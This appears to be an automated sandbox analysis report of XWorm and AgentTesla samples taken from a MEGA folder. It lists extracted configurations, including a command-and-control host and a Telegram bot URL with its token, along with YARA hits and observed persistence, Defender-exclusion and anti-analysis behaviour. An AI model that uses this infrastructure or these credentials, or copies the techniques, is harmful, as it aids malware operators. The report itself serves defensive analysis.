Analysis
max time kernel: 1800s
max time network: 1799s
platform: windows10-2004_x64
resource: win10v2004-20240802-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240802-en locale:en-us os:windows10-2004-x64 system
submitted: 08/08/2024, 06:50
Static task: static1
URLScan task: urlscan1
Behavioral task: behavioral1
Sample: https://mega.nz/folder/o7onBAqb#lPnM6du1_ZsHQgf5SIaC4Q
Resource: win10v2004-20240802-en
General
Target: https://mega.nz/folder/o7onBAqb#lPnM6du1_ZsHQgf5SIaC4Q
Malware Config
Extracted
  xworm
  3.1
  society-painted.at.ply.gg:17251
  Install_directory: %Public%
  install_file: USB.exe
  telegram: https://api.telegram.org/bot5817418329:AAGYtFww9eAGl3ZTuqrCmSNxu_TJJiAWkzA/sendMessage?chat_id=1860651440
Extracted
  xworm
  5.0
  127.0.0.1:7000
  oRS7BxRwxp3BS0Q4
  install_file: USB.exe
Extracted
  xworm
  127.0.0.1:7000
  install_file: USB.exe
Signatures
AgentTesla
Agent Tesla is a remote access tool (RAT) written in Visual Basic.
Detect Xworm Payload 6 IoCs
resource | yara_rule
behavioral1/files/0x00090000000235c1-284.dat | family_xworm
behavioral1/memory/5928-292-0x0000000000A70000-0x0000000000AAE000-memory.dmp | family_xworm
behavioral1/files/0x000b00000002364d-11430.dat | family_xworm
behavioral1/files/0x0009000000023654-11440.dat | family_xworm
behavioral1/memory/4536-22122-0x000000000DAD0000-0x000000000DAE4000-memory.dmp | family_xworm
behavioral1/memory/1448-22236-0x0000000000400000-0x0000000000414000-memory.dmp | family_xworm
AgentTesla payload 1 IoCs
resource | yara_rule
behavioral1/memory/444-11401-0x000001F94D1F0000-0x000001F94D3E4000-memory.dmp | family_agenttesla
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Runs PowerShell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid | Process
5428 | powershell.exe
5260 | powershell.exe
5388 | powershell.exe
5768 | powershell.exe
68 | powershell.exe
5536 | powershell.exe
5652 | powershell.exe
5340 | powershell.exe
5900 | powershell.exe
372 | powershell.exe
1804 | powershell.exe
2376 | powershell.exe
Checks computer location settings 2 TTPs 3 IoCs
Looks up the country code configured in the registry, likely for geofencing.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation | WinRAR.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation | Luxury Shield 7.1.exe
Key value queried | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Control Panel\International\Geo\Nation | Luxury Shield 7.1.exe
Drops startup file 2 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinRAR.lnk | WinRAR.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WinRAR.lnk | WinRAR.exe
Executes dropped EXE 45 IoCs
pid | Process
5628 | Luxury Shield 7.1.exe
5928 | WinRAR.exe
4144 | Luxury Shield 7.1.exe
5680 | WinRAR.exe
2312 | Luxury Shield 7.1.exe
3788 | WinRAR.exe
2192 | WinRAR.exe
5608 | Luxury Shield 7.1.exe
5696 | WinRAR.exe
4976 | WinRAR.exe
5852 | WinRAR.exe
5688 | WinRAR.exe
1704 | WinRAR.exe
2472 | WinRAR.exe
2304 | Progman.exe
444 | XWorm.exe
3896 | WinRAR.exe
4656 | WinRAR.exe
1820 | WinRAR.exe
800 | WinRAR.exe
4536 | Luxury Shield 7.1.exe
5272 | WinRAR.exe
3468 | WinRAR.exe
5068 | Luxury Shield 7.1.exe
5032 | WinRAR.exe
5856 | WinRAR.exe
3500 | WinRAR.exe
2332 | WinRAR.exe
4856 | WinRAR.exe
1920 | WinRAR.exe
4740 | WinRAR.exe
1792 | WinRAR.exe
4648 | WinRAR.exe
3136 | nexusv2.exe
1448 | nexusv2.exe
3396 | WinRAR.exe
2324 | WinRAR.exe
3204 | WinRAR.exe
5132 | WinRAR.exe
5908 | WinRAR.exe
5572 | WinRAR.exe
6040 | WinRAR.exe
5572 | WinRAR.exe
2656 | WinRAR.exe
3468 | WinRAR.exe
Loads dropped DLL 2 IoCs
pid | Process
2312 | Luxury Shield 7.1.exe
4536 | Luxury Shield 7.1.exe
Obfuscated with Agile.Net obfuscator 33 IoCs
Detects use of the Agile.Net commercial obfuscator, which is capable of entity renaming and control flow obfuscation.
resource | yara_rule
behavioral1/memory/2312-421-0x000000000B780000-0x000000000B9CC000-memory.dmp | agile_net
behavioral1/memory/2312-465-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-477-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-483-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-487-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-485-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-479-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-475-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-473-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-471-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-469-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-467-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-463-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-461-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-459-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-457-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-455-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-453-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-451-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-447-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-445-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-441-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-439-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-433-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-430-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-481-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-449-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-443-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-437-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-435-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/memory/2312-431-0x000000000B780000-0x000000000B9C8000-memory.dmp | agile_net
behavioral1/files/0x0007000000023601-11341.dat | agile_net
behavioral1/memory/444-11398-0x000001F92F7C0000-0x000001F932A38000-memory.dmp | agile_net
resource | yara_rule
behavioral1/files/0x00080000000235fe-11319.dat | upx
behavioral1/memory/2304-11335-0x0000000140000000-0x00000001407A1000-memory.dmp | upx
Uses the VBS compiler for execution 1 TTPs
Adds Run key to start application 2 TTPs 1 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\WinRAR = "C:\\Users\\Public\\WinRAR.exe" | WinRAR.exe
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
pid | Process
5628 | Luxury Shield 7.1.exe
4144 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
5608 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
444 | XWorm.exe
2312 | Luxury Shield 7.1.exe
444 | XWorm.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
2312 | Luxury Shield 7.1.exe
4536 | Luxury Shield 7.1.exe
4536 | Luxury Shield 7.1.exe
4536 | Luxury Shield 7.1.exe
4536 | Luxury Shield 7.1.exe
4536 | Luxury Shield 7.1.exe
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 3136 set thread context of 1448 | 3136 | nexusv2.exe | 220
Drops file in Windows directory 1 IoCs
description | ioc | Process
File created | C:\Windows\Progman.exe | XWorm V5.3.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Program crash 1 IoCs
pid | pid_target | Process | procid_target
1500 | 2312 | WerFault.exe | 136
System Location Discovery: System Language Discovery 1 TTPs 19 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Luxury Shield 7.1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | csc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Luxury Shield 7.1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Luxury Shield 7.1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cvtres.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | nexusv2.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Luxury Shield 7.1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | csc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cvtres.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Luxury Shield 7.1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Luxury Shield 7.1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | DllHost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | DllHost.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | nexusv2.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | csc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cvtres.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | cmd.exe
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | nexusv2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | nexusv2.exe
Enumerates system info in registry 2 TTPs 10 IoCs
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | nexusv2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSVersion | nexusv2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\BIOSReleaseDate | nexusv2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | nexusv2.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | XWorm.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | XWorm.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemVersion | XWorm.exe
description | ioc | Process
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000\Software\Microsoft\Internet Explorer\TypedURLs | XWorm.exe
Modifies registry class 64 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | XWorm.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 010000000000000002000000ffffffff | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 010000000200000000000000ffffffff | Luxury Shield 7.1.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9 | Luxury Shield 7.1.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202020202020202 | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a000000a000000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\MRUListEx = 00000000ffffffff | XWorm.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0 | XWorm.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2\0 | XWorm.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0 = 8400310000000000085919371100444f574e4c4f7e3100006c0009000400efbe02598363085919372e0000007fe10100000001000000000000000000420000000000da374e0044006f0077006e006c006f00610064007300000040007300680065006c006c00330032002e0064006c006c002c002d0032003100370039003800000018000000 | XWorm.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\0\0\0\0\0\0 = 500031000000000008591a37100049636f6e73003c0009000400efbe08591a3708591d372e00000035360200000007000000000000000000000000000000e83cf200490063006f006e007300000014000000 | XWorm.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0 | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Mode = "4" | Luxury Shield 7.1.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2\0\1 | Luxury Shield 7.1.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" | msedge.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1 | XWorm.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\1\MRUListEx = 00000000ffffffff | XWorm.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0" | XWorm.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\Version = "1" | Luxury Shield 7.1.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\2\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | Luxury Shield 7.1.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | msedge.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\Shell\SniffedFolderType = "Downloads" | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | Luxury Shield 7.1.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" | Luxury Shield 7.1.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2\0\1\NodeSlot = "11" | Luxury Shield 7.1.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg | Luxury Shield 7.1.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202020202020202020202 | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\IconSize = "16" | Luxury Shield 7.1.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1" | Luxury Shield 7.1.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2\0\0\MRUListEx = ffffffff | Luxury Shield 7.1.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = 010000000200000000000000ffffffff | Luxury Shield 7.1.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259} | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings | msedge.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell | Luxury Shield 7.1.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\10\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" | Luxury Shield 7.1.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupView = "0" | Luxury Shield 7.1.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\7\ComDlg | XWorm.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\11\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\GroupByKey:PID = "0" | Luxury Shield 7.1.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1 = 3a001f44471a0359723fa74489c55595fe6b30ee260001002600efbe1000000071beae6cd7e4da019a79482edde4da015973dd0962e9da0114000000 | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\12\ComDlg\{CD0FC69B-71E2-46E5-9690-5BCD9F57AAB3}\GroupByDirection = "1" | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" | msedge.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\6\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "1092616257" | XWorm.exe
Key created | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 | Luxury Shield 7.1.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\2\0\0 = 5600310000000000085924371000506c7567696e7300400009000400efbe08591a37085924372e0000000f36020000000700000000000000000000000000000042c91b0050006c007500670069006e007300000016000000 | Luxury Shield 7.1.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" | Luxury Shield 7.1.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\FFlags = "1" | Luxury Shield 7.1.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-4182098368-2521458979-3782681353-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000040000001800000030f125b7ef471a10a5f102608c9eebac0a0000001001000030f125b7ef471a10a5f102608c9eebac0e0000009000000030f125b7ef471a10a5f102608c9eebac040000007800000030f125b7ef471a10a5f102608c9eebac0c00000050000000 | Luxury Shield 7.1.exe
